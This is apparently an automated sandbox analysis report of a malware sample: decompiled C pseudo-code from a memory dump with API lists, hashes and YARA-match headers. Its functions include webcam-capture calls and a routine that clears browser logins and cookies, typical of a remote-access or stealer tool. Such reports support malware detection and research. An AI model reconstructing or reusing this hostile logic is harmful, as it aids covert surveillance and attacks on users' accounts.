										__eflags = _t131;
										if(_t131 == 0) {
											_t56 =  *0x46bac4();
											 *0x46ba77 = _t56;
											__eflags = _t56;
											if(__eflags == 0) {
												L15:
												E004020CC(_t75, _t140 - 0x18, _t115, __eflags, 0x46c1b8);
												_push(0x41);
												L23:
												L00404A6E(_t75, _a4, _t115, __eflags);
											} else {
												_t59 = E00436079(_t57, L00401F75(L00401E29( &_v52, _t115, __eflags, _t131)));
												 *_t140 = 0x3e8;
												Sleep(??);
												_t115 = _t59;
												E004046E8(_a4, _t59, __eflags);
												 *0x46bac0();
											}
										}
									}
								}
							}
						}
						L00401E54( &_v52, _t115);
						L00401FA7();
						L00401FA7();
						__eflags = 0;
						return 0;
					} else {
						_t62 =  &(_t115[_t75]);
						_a12 =  &(_t115[_t75]);
						__eflags = _t75;
						if(__eflags != 0) {
							_push(0);
							_t64 = E004027F5(_t75, _t124, _t115, _t120, __eflags, _t62);
							__eflags = _t64;
							if(_t64 != 0) {
								_push( *_a8);
								_t66 = E00402209(_t124);
								E0040157F(E00402209(_t124) + _t75 * 2, _t66);
								_push(_t75);
								E0040156B(E00402209(_t124), _t120);
								E00402868(_a12);
							}
						}
						_t63 = _t124;
						goto L7;
					}
				} else {
					_t63 = E0040359F(__ebx, _t124, __edx, _t120 - E00402209(_t78) >> 1, _t124, _t146, _t78, _t124, _t120 - E00402209(_t78) >> 1, _a12);
					L7:
					return _t63;
				}
			}


































                              0x0040446a
                              0x0040446b
                              0x0040446e
                              0x00404471
                              0x00404476
                              0x00404478
                              0x0040447a
                              0x00404494
                              0x00404497
                              0x0040449e
                              0x004044a3
                              0x004044a6
                              0x004044a9
                              0x004044af
                              0x004044b1
                              0x00404512
                              0x00404517
                              0x00404524
                              0x00404525
                              0x00404538
                              0x0040453d
                              0x00404547
                              0x0040454c
                              0x00404556
                              0x0040455f
                              0x00404564
                              0x00404567
                              0x00404567
                              0x0040456a
                              0x0040465d
                              0x0040465f
                              0x00404661
                              0x00404674
                              0x00404685
                              0x0040468c
                              0x00404691
                              0x00404696
                              0x004046a5
                              0x004046ac
                              0x004046b8
                              0x004046bd
                              0x00000000
                              0x004046bd
                              0x00404570
                              0x00404570
                              0x00404570
                              0x00404573
                              0x0040460f
                              0x00404616
                              0x00000000
                              0x00000000
                              0x00404579
                              0x00404579
                              0x00404579
                              0x0040457c
                              0x004045fd
                              0x00404603
                              0x0040457e
                              0x0040457e
                              0x0040457e
                              0x00404581
                              0x004045ec
                              0x004045f2
                              0x004045f7
                              0x004045f9
                              0x00000000
                              0x004045fb
                              0x0040461c
                              0x00404638
                              0x0040463a
                              0x0040463a
                              0x00404583
                              0x00404583
                              0x00404583
                              0x00404586
                              0x0040458c
                              0x00404592
                              0x00404597
                              0x00404599
                              0x004045d6
                              0x004045e0
                              0x004045e5
                              0x004046bf
                              0x004046c2
                              0x0040459b
                              0x004045ad
                              0x004045b4
                              0x004045bb
                              0x004045c4
                              0x004045c6
                              0x004045cb
                              0x004045cb
                              0x00404599
                              0x00404586
                              0x00404581
                              0x0040457c
                              0x00404573
                              0x004046cb
                              0x004046d4
                              0x004046dc
                              0x004046e1
                              0x004046e7
                              0x004044b3
                              0x004044b3
                              0x004044b6
                              0x004044b9
                              0x004044bb
                              0x004044bd
                              0x004044c2
                              0x004044c7
                              0x004044c9
                              0x004044d0
                              0x004044d2
                              0x004044e3
                              0x004044ed
                              0x004044f5
                              0x00404502
                              0x00404502
                              0x004044c9
                              0x00404507
                              0x00000000
                              0x00404509
                              0x0040447c
                              0x0040448d
                              0x0040450a
                              0x0040450d
                              0x0040450d

                              APIs
                              • Sleep.KERNEL32(00000000,?), ref: 004045BB
                                • Part of subcall function 004046E8: __EH_prolog.LIBCMT ref: 004046ED
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: H_prologSleep
                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                              • API String ID: 3469354165-3547787478
                              • Opcode ID: 956d68f455a1026b978206eb89fe73a27ea02819beab721a7bcc5ef72be57ce2
                              • Instruction ID: 5a17ec9c29155d9da4fdaf8b9e23beca59789b2fbc5ce9981412f47b601f43b7
                              • Opcode Fuzzy Hash: 956d68f455a1026b978206eb89fe73a27ea02819beab721a7bcc5ef72be57ce2
                              • Instruction Fuzzy Hash: 5851E4B1604211ABCA04BB76DC5AA6E3B559BC1708F00053FF905AB7E2EF7D890587DE
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0043C2CD, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                              Download Yara Rule
                              C-Code - Quality: 82%
                              			E0043C2CD(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x46a00c; // 0x5d382218
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = L00440C0D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E0042E9F4(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0042E9F4(_t78 + 4);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0042E9F4(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00446905(_t56);
						_t40 = L0043EE85(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00446905(_t56);
						L0043EE85(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x46a00c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                              0x0043c2cd
                              0x0043c2d7
                              0x0043c2db
                              0x0043c2dd
                              0x0043c2e1
                              0x0043c2eb
                              0x0043c2fc
                              0x0043c301
                              0x0043c303
                              0x0043c305
                              0x0043c307
                              0x0043c309
                              0x0043c30d
                              0x0043c3c7
                              0x0043c3d5
                              0x0043c3d7
                              0x0043c3dc
                              0x0043c3e3
                              0x0043c3f3
                              0x0043c402
                              0x0043c405
                              0x0043c407
                              0x00000000
                              0x0043c408
                              0x0043c315
                              0x0043c31a
                              0x0043c31f
                              0x0043c321
                              0x0043c321
                              0x0043c323
                              0x0043c328
                              0x0043c32c
                              0x0043c32c
                              0x0043c32f
                              0x0043c34e
                              0x0043c34e
                              0x0043c350
                              0x0043c353
                              0x0043c35c
                              0x0043c35f
                              0x0043c364
                              0x0043c367
                              0x0043c36c
                              0x00000000
                              0x00000000
                              0x0043c36e
                              0x00000000
                              0x0043c331
                              0x0043c331
                              0x0043c333
                              0x0043c33c
                              0x0043c33f
                              0x0043c344
                              0x0043c347
                              0x0043c34c
                              0x0043c376
                              0x0043c379
                              0x0043c37b
                              0x0043c37e
                              0x0043c386
                              0x0043c38c
                              0x0043c393
                              0x0043c395
                              0x0043c39d
                              0x0043c3ac
                              0x0043c3b0
                              0x0043c3b2
                              0x0043c3b5
                              0x00000000
                              0x00000000
                              0x0043c3b7
                              0x0043c3ba
                              0x0043c3bc
                              0x0043c3bc
                              0x0043c3bd
                              0x0043c3bf
                              0x0043c3c2
                              0x00000000
                              0x0043c3bc
                              0x00000000
                              0x0043c34c
                              0x0043c32f
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: f5a743782674b4330f893bb4fce6fbdccd014e0b763f5d5a9f30bb5d138f4f29
                              • Instruction ID: b8c2f117a08c9f7e3d0690f36157727bc88d5e2796b8de3530b344be676623de
                              • Opcode Fuzzy Hash: f5a743782674b4330f893bb4fce6fbdccd014e0b763f5d5a9f30bb5d138f4f29
                              • Instruction Fuzzy Hash: A641F772A002109FCB10DF79C881A6EB3B5EF89314F15816EE915EB341EB34ED01CB85
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040A8C0, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 103sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 83%
                              			E0040A8C0(void* __edi) {
				char _v5;
				char _v6;
				char _v7;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t18;
				void* _t36;
				intOrPtr _t40;
				char _t50;
				void* _t52;
				signed int _t53;
				signed int _t54;
				void* _t55;

				_t52 = __edi;
				_t54 = _t53 & 0xfffffff8;
				 *0x46bafd = 1;
				Sleep( *0x46baf8);
				_v7 = 0;
				_t36 = 0;
				_v6 = 0;
				_v5 = 0;
				goto L1;
				do {
					do {
						L1:
						_t59 = _t36;
						if(_t36 == 0) {
							L2:
							_t36 = E0040A7A6(_t59);
						}
						_t60 = _t36;
						if(_t36 == 0) {
							_t36 = E0040A5CA(_t52, _t60);
						}
						_t61 = _v6;
						if(_v6 == 0) {
							_v6 = E0040A3AF(_t36, _t52, _t61);
						}
						_t62 = _v7;
						if(_v7 == 0) {
							_v7 = E0040A320(_t52, _t62);
						}
						_t50 = _v5;
						_t63 = _t50;
						if(_t50 == 0) {
							_t50 = E0040A291(_t52, _t63);
							_v5 = _t50;
						}
						if(_t36 == 0 || _t36 == 0) {
							L16:
							Sleep(0x1388);
							_t18 = _v7;
							_t40 = _v6;
							_t50 = _v5;
						} else {
							_t18 = _v7;
							if(_t18 == 0 || _t50 == 0) {
								goto L16;
							} else {
								_t40 = _v6;
								if(_t40 == 0) {
									goto L16;
								}
							}
						}
						if(_t36 == 0) {
							goto L2;
						}
					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
					_t73 = _t40;
				} while (_t40 == 0);
				_t55 = _t54 - 0x18;
				E00402064(_t36, _t55, "\n[Cleared browsers logins and cookies.]\n");
				L0040AA8C(_t36, _t50, _t73);
				E00402064(_t36, _t55, "Cleared browsers logins and cookies.");
				_t56 = _t55 - 0x18;
				E00402064(_t36, _t55 - 0x18, "[Info]");
				E004165D8(_t36, _t52);
				E00402064(_t36, _t56 + 0x18, 0x45f6ac);
				_push(0xaf);
				L00404A6E(_t36, 0x46c768, _t50, _t73);
				if( *0x46bafc != 0) {
					E004105A0(0x46c518, L00401F75(0x46c518), "FR", 1);
				}
				 *0x46bafd = 0;
				return 0;
			}

















                              0x0040a8c0
                              0x0040a8c3
                              0x0040a8ce
                              0x0040a8d5
                              0x0040a8e1
                              0x0040a8e5
                              0x0040a8e7
                              0x0040a8ed
                              0x0040a8ed
                              0x0040a8f1
                              0x0040a8f1
                              0x0040a8f1
                              0x0040a8f1
                              0x0040a8f3
                              0x0040a8f5
                              0x0040a8fa
                              0x0040a8fa
                              0x0040a8fc
                              0x0040a8fe
                              0x0040a905
                              0x0040a905
                              0x0040a90b
                              0x0040a90d
                              0x0040a914
                              0x0040a914
                              0x0040a91c
                              0x0040a91e
                              0x0040a925
                              0x0040a925
                              0x0040a929
                              0x0040a92d
                              0x0040a92f
                              0x0040a936
                              0x0040a938
                              0x0040a938
                              0x0040a93e
                              0x0040a958
                              0x0040a95d
                              0x0040a963
                              0x0040a967
                              0x0040a96b
                              0x0040a944
                              0x0040a944
                              0x0040a94a
                              0x00000000
                              0x0040a950
                              0x0040a950
                              0x0040a956
                              0x00000000
                              0x00000000
                              0x0040a956
                              0x0040a94a
                              0x0040a971
                              0x00000000
                              0x00000000
                              0x0040a973
                              0x0040a98b
                              0x0040a98b
                              0x0040a993
                              0x0040a99d
                              0x0040a9a2
                              0x0040a9ae
                              0x0040a9b3
                              0x0040a9bd
                              0x0040a9c2
                              0x0040a9d1
                              0x0040a9d6
                              0x0040a9e0
                              0x0040a9ec
                              0x0040aa01
                              0x0040aa07
                              0x0040aa08
                              0x0040aa15

                              APIs
                              Strings
                              • Cleared browsers logins and cookies., xrefs: 0040A9A9
                              • [Cleared browsers logins and cookies.], xrefs: 0040A998
                              • [Info], xrefs: 0040A9B8
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
                              • API String ID: 3472027048-899236412
                              • Opcode ID: 1bd6dba79231424a18c026f3c1d748ec3a4d0886920e6503585f70a56013897d
                              • Instruction ID: 19d006f3e93ca70ec29b0e88cbd9a77eefac28184490fc762d726c12d351d6c4
                              • Opcode Fuzzy Hash: 1bd6dba79231424a18c026f3c1d748ec3a4d0886920e6503585f70a56013897d
                              • Instruction Fuzzy Hash: 7B3190013483816ECA1577B6142A7AB7F824A93748F09847FF9C4373D3DABA4859936F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041729F, Relevance: 7.6, APIs: 5, Instructions: 69fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 91%
                              			E0041729F(void* __ecx, long __edx, WCHAR* _a4, long _a8) {
				void* _v8;
				long _v12;
				long _t10;
				long _t11;
				struct _OVERLAPPED* _t16;
				struct _OVERLAPPED* _t21;
				long _t24;
				long _t27;
				void* _t30;

				_push(__ecx);
				_push(__ecx);
				_t21 = 0;
				_v8 = __ecx;
				_t27 = __edx;
				_t10 = _a8;
				if(_t10 == 0) {
					_t11 = 0x40000000;
					_t24 = 2;
				} else {
					if(_t10 != 1) {
						_t11 = _a8;
						_t24 = _a8;
					} else {
						_t11 = 4;
						_t24 = _t11;
					}
				}
				_t30 = CreateFileW(_a4, _t11, _t21, _t21, _t24, 0x80, _t21);
				if(_t30 != 0xffffffff) {
					if(_a8 != 1 || SetFilePointer(_t30, _t21, _t21, 2) != 0xffffffff) {
						if(WriteFile(_t30, _v8, _t27,  &_v12, _t21) != 0) {
							_t21 = 1;
						}
						CloseHandle(_t30);
						_t16 = _t21;
						goto L13;
					} else {
						CloseHandle(_t30);
						goto L6;
					}
				} else {
					L6:
					_t16 = 0;
					L13:
					return _t16;
				}
			}












                              0x004172a2
                              0x004172a3
                              0x004172a9
                              0x004172ab
                              0x004172af
                              0x004172b1
                              0x004172b3
                              0x004172cb
                              0x004172d0
                              0x004172b5
                              0x004172b8
                              0x004172c1
                              0x004172c4
                              0x004172ba
                              0x004172bc
                              0x004172bd
                              0x004172bd
                              0x004172b8
                              0x004172e4
                              0x004172e9
                              0x004172f3
                              0x00417320
                              0x00417322
                              0x00417322
                              0x00417325
                              0x0041732b
                              0x00000000
                              0x00417305
                              0x00417306
                              0x00000000
                              0x00417306
                              0x004172eb
                              0x004172eb
                              0x004172eb
                              0x0041732d
                              0x00417333
                              0x00417333

                              APIs
                              • CreateFileW.KERNEL32(00405D1C,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,004173C9,00000000,00000000), ref: 004172DE
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,004173C9,00000000,00000000,00000000,00000004), ref: 004172FA
                              • CloseHandle.KERNEL32(00000000,?,004173C9,00000000,00000000,00000000,00000004), ref: 00417306
                              • WriteFile.KERNEL32(00000000,00000000,00000000,00405D1C,00000000,?,004173C9,00000000,00000000,00000000,00000004), ref: 00417318
                              • CloseHandle.KERNEL32(00000000,?,004173C9,00000000,00000000,00000000,00000004), ref: 00417325
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreatePointerWrite
                              • String ID:
                              • API String ID: 1852769593-0
                              • Opcode ID: 255b8a181737147229ba99e999fd0b5ca8637e7c11ae7a67e0008db9ce4defcd
                              • Instruction ID: ea825e8bd67a10857e8b7964dc2fd0b8df6dfe7544f80a4ef1d900d86e80f7e8
                              • Opcode Fuzzy Hash: 255b8a181737147229ba99e999fd0b5ca8637e7c11ae7a67e0008db9ce4defcd
                              • Instruction Fuzzy Hash: 0E11A371204118BFEB104F64AC89EFB777CEB05365F104266FD25D6280C6748E819668
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044618A, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E0044618A() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00446153(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E0043E61D(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						L0043EE85(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                              0x00446199
                              0x0044619f
                              0x004461f7
                              0x004461f7
                              0x004461a1
                              0x004461a2
                              0x004461a7
                              0x004461b0
                              0x004461b6
                              0x004461bc
                              0x004461c1
                              0x00000000
                              0x004461c3
                              0x004461c9
                              0x004461ce
                              0x004461ec
                              0x004461e6
                              0x004461e6
                              0x004461e8
                              0x004461e8
                              0x004461ef
                              0x004461f4
                              0x004461c1
                              0x004461fb
                              0x004461fe
                              0x004461fe
                              0x0044620c

                              APIs
                              • GetEnvironmentStringsW.KERNEL32 ref: 00446193
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004461B6
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,?,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 0043E64F
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004461DC
                              • _free.LIBCMT ref: 004461EF
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004461FE
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                              • String ID:
                              • API String ID: 2278895681-0
                              • Opcode ID: 1d06af7fe9b9c0b38868f9dfd187ca8fc9741270ba8cbd3e824131a6f2c0cc53
                              • Instruction ID: a4a757ec6fd77dd09b4353e0e1f60453f24905d0662e5e34b4457866c2e58ca0
                              • Opcode Fuzzy Hash: 1d06af7fe9b9c0b38868f9dfd187ca8fc9741270ba8cbd3e824131a6f2c0cc53
                              • Instruction Fuzzy Hash: A901D4B26017117B73211AB76C8CC7B696DDAC7BA6716013EB914C3242DE69CE0281BA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004409F6, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                              Download Yara Rule
                              C-Code - Quality: 82%
                              			E004409F6(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x46a1e0; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = L0043DFD9(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = L00440F8E(_t13, _t16, __eflags,  *0x46a1e0, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E004407E4(_t13, _t15, 0x46b654);
							L0043EE85(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						L0043EE85();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = L00440F38(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











                              0x004409f6
                              0x00440a01
                              0x00440a03
                              0x00440a05
                              0x00440a0a
                              0x00440a0d
                              0x00440a1b
                              0x00440a27
                              0x00440a2a
                              0x00440a2d
                              0x00440a3f
                              0x00440a44
                              0x00440a46
                              0x00440a51
                              0x00440a57
                              0x00440a5f
                              0x00440a61
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00440a48
                              0x00440a48
                              0x00000000
                              0x00440a48
                              0x00440a2f
                              0x00440a2f
                              0x00440a30
                              0x00440a30
                              0x00440a63
                              0x00440a64
                              0x00440a64
                              0x00440a0f
                              0x00440a15
                              0x00440a19
                              0x00440a6c
                              0x00440a6d
                              0x00440a73
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00440a19
                              0x00440a7a

                              APIs
                              • GetLastError.KERNEL32(?,?,?,00439E19,0043E660,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 004409FB
                              • _free.LIBCMT ref: 00440A30
                              • _free.LIBCMT ref: 00440A57
                              • SetLastError.KERNEL32(00000000), ref: 00440A64
                              • SetLastError.KERNEL32(00000000), ref: 00440A6D
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free
                              • String ID:
                              • API String ID: 3170660625-0
                              • Opcode ID: 028a3b3f714006f7a54fa04eab429af857446056a4e71c51cb6c7d6ce34851f3
                              • Instruction ID: 1381cb6b9671630b60042f8ed21df7efebf9c3361f552f6813510b12c123861f
                              • Opcode Fuzzy Hash: 028a3b3f714006f7a54fa04eab429af857446056a4e71c51cb6c7d6ce34851f3
                              • Instruction Fuzzy Hash: 4D014936141B0077F211A7726C8592B1628ABE17B6B24003BF606B22C2EE7CCD27812F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004477EC, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004477EC(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x46a188; // 0x46a180
					if(_t23 != 0) {
						L0043EE85(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46a18c; // 0x46b64c
					if(_t24 != 0) {
						L0043EE85(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46a190; // 0x46b64c
					if(_t25 != 0) {
						L0043EE85(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x46a1b8; // 0x46a184
					if(_t26 != 0) {
						L0043EE85(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x46a1bc; // 0x46b650
					if(_t27 != 0) {
						return L0043EE85(_t6);
					}
				}
				return _t6;
			}










                              0x004477f2
                              0x004477f7
                              0x004477fb
                              0x00447801
                              0x00447804
                              0x00447809
                              0x0044780d
                              0x00447813
                              0x00447816
                              0x0044781b
                              0x0044781f
                              0x00447825
                              0x00447828
                              0x0044782d
                              0x00447831
                              0x00447837
                              0x0044783a
                              0x0044783f
                              0x00447840
                              0x00447843
                              0x00447849
                              0x00000000
                              0x00447851
                              0x00447849
                              0x00447854

                              APIs
                              • _free.LIBCMT ref: 00447804
                                • Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?), ref: 0043EE9B
                                • Part of subcall function 0043EE85: GetLastError.KERNEL32(?,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?,?), ref: 0043EEAD
                              • _free.LIBCMT ref: 00447816
                              • _free.LIBCMT ref: 00447828
                              • _free.LIBCMT ref: 0044783A
                              • _free.LIBCMT ref: 0044784C
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: c9621e6e9bb6c527d0aa5a5513f425a73d73250b567ec94b1b2a79943738f87b
                              • Instruction ID: 4303ca86cc9478dbe0e1a161fb054b60f5dbdf3f65db9d6ac859b8e84f87df60
                              • Opcode Fuzzy Hash: c9621e6e9bb6c527d0aa5a5513f425a73d73250b567ec94b1b2a79943738f87b
                              • Instruction Fuzzy Hash: 21F0683240950067D620FB56E8C6C4773E9AB85B11B64182FF014E7641DF78FC86CA5E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0043C51C, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                              Download Yara Rule
                              C-Code - Quality: 91%
                              			E0043C51C(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x46a9a0; // 0x3188680
					if(_t7 != 0x46a780) {
						L0043EE85(_t7);
						 *0x46a9a0 = 0x46a780;
					}
				}
				L0043EE85( *0x46ba08);
				 *0x46ba08 = 0;
				L0043EE85( *0x46ba0c);
				 *0x46ba0c = 0;
				L0043EE85( *0x46ba34);
				 *0x46ba34 = 0;
				L0043EE85( *0x46ba38);
				 *0x46ba38 = 0;
				return 1;
			}




                              0x0043c525
                              0x0043c529
                              0x0043c52b
                              0x0043c537
                              0x0043c53a
                              0x0043c540
                              0x0043c540
                              0x0043c537
                              0x0043c54c
                              0x0043c559
                              0x0043c55f
                              0x0043c56a
                              0x0043c570
                              0x0043c57b
                              0x0043c581
                              0x0043c589
                              0x0043c592

                              APIs
                              • _free.LIBCMT ref: 0043C53A
                                • Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?), ref: 0043EE9B
                                • Part of subcall function 0043EE85: GetLastError.KERNEL32(?,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?,?), ref: 0043EEAD
                              • _free.LIBCMT ref: 0043C54C
                              • _free.LIBCMT ref: 0043C55F
                              • _free.LIBCMT ref: 0043C570
                              • _free.LIBCMT ref: 0043C581
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 80c2171898103eb12c93d11cd7c08f3c9485e93dcbeac0e5505a8b45fced9d94
                              • Instruction ID: db1f80643b0f74365b7cf98d951e7b1d55b60743bdd7e37d059670ddde76a049
                              • Opcode Fuzzy Hash: 80c2171898103eb12c93d11cd7c08f3c9485e93dcbeac0e5505a8b45fced9d94
                              • Instruction Fuzzy Hash: 90F0F471803A209BCB116F96BC824063760E748B24B11152BF410E67B1FFB94596CFDF
